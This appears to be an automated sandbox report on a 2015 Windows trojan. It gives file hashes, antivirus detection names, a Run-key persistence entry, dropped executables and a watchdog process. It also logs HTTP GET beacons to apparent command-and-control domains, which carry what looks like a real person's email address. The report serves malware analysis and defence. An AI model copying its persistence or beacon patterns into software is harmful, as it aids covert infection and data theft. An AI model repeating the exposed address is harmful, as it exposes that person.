Analysis Date: 2015-07-25 08:48:21
MD5: 0f59988b7bec8514930a4acd531d9934
SHA1: 69033f40e9927db251091117a607279fc3139e2d

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 3b36720d5742f1e38b7ee12fde4ff5ad sha1: 1f3dd4f1fe74576c26fb1791f1b10acf232092df size: 296448
Section .rdata: md5: 2f2eaf4fa38d78c18d942d5e45d6e95e sha1: 528d377da469172aaf9d4a2f5422e66f5b691228 size: 32768
Section .data: md5: 62c0b18e9101544f077c563d03806a82 sha1: 325763828182df647e38890ab1f2b7f2c8088239 size: 98304
Timestamp: 2014-10-30 10:26:02
Packer: Microsoft Visual C++ ?.?
PEhash: 709d5b2a4a0a30329b46e5ea2216ca5b8b4205bd
IMPhash: 57ea14fdab2d286a6a8d3b04b097a2cc
AV Rising: no_virus
AV Mcafee: Trojan-FEMT!0F59988B7BEC
AV Avira (antivir): BDS/Zegost.Gen4
AV Twister: Trojan.Agent.VNC.aanx.mg
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Eset (nod32): Win32/Agent.VNC
AV Grisoft (avg): Win32/Cryptor
AV Symantec: Downloader.Upatre!g15
AV Fortinet: W32/Agent.VNC!tr
AV BitDefender: Gen:Variant.Symmi.22722
AV K7: no_virus
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.BD
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV MalwareBytes: Trojan.Zbot.WHE
AV Authentium: W32/Wonton.B2.gen!Eldorado
AV Frisk (f-prot): no_virus
AV Ikarus: Trojan.FBAccountLock
AV Emsisoft: Gen:Variant.Symmi.22722
AV Zillya!: no_virus
AV Kaspersky: Trojan.Win32.Generic
AV Trend Micro: TSPY_NIVDORT.SMB
AV CAT (quickheal): Trojan.Dynamer.AC3
AV VirusBlokAda (vba32): no_virus
AV Padvish: no_virus
AV BullGuard: Gen:Variant.Symmi.22722
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV ClamAV: no_virus
AV Dr. Web: no_virus
AV F-Secure: Gen:Variant.Symmi.22722
AV CA (E-Trust Ino): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\HomeGroup Session Telephony Auto Shadow ➝ C:\Documents and Settings\Administrator\Application Data\gsjsvjttvnqxoct\twcamwkru.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\gsjsvjttvnqxoct\twcamwkru.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\gsjsvjttvnqxoct\twcamwkru.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\gsjsvjttvnqxoct\twcamwkru.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\gsjsvjttvnqxoct\cdetebmyipb.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\gsjsvjttvnqxoct\twcamwkru.nvntb
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\gsjsvjttvnqxoct\twcamwkru.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\gsjsvjttvnqxoct\twcamwkru.exe"

Network Details:

HTTP GET: http://crowdcatch.net/index.php?email=katharina.mosseng@lofotenseafood.no&method=post&len
User-Agent: (empty)
HTTP GET: http://summerdress.net/index.php?email=katharina.mosseng@lofotenseafood.no&method=post&len
User-Agent: (empty)
HTTP GET: http://partydress.net/index.php?email=katharina.mosseng@lofotenseafood.no&method=post&len
User-Agent: (empty)
HTTP GET: http://laughnotice.net/index.php?email=katharina.mosseng@lofotenseafood.no&method=post&len
User-Agent: (empty)
Flows TCP: 192.168.1.1:1031 ➝ 50.63.202.47:80
Flows TCP: 192.168.1.1:1032 ➝ 50.87.150.116:80
Flows TCP: 192.168.1.1:1033 ➝ 208.73.211.179:80
Flows TCP: 192.168.1.1:1034 ➝ 95.211.230.75:80
